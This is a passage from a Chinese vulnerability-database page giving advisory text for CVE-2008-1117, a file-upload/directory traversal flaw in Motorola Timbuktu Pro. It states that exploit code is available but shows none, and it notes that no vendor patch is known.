The file-upload vulnerability may be related to BID 25453 (Motorola Timbuktu Pro Directory Traversal Vulnerability).

-
漏洞利用

Attackers can use readily available tools to exploit these issues.



The following exploit code is available:

-
解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]



-
相关参考

本文标题:CVE-2008-1117-漏洞详情
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2019/0713_3333.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2008-1117-漏洞详情
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们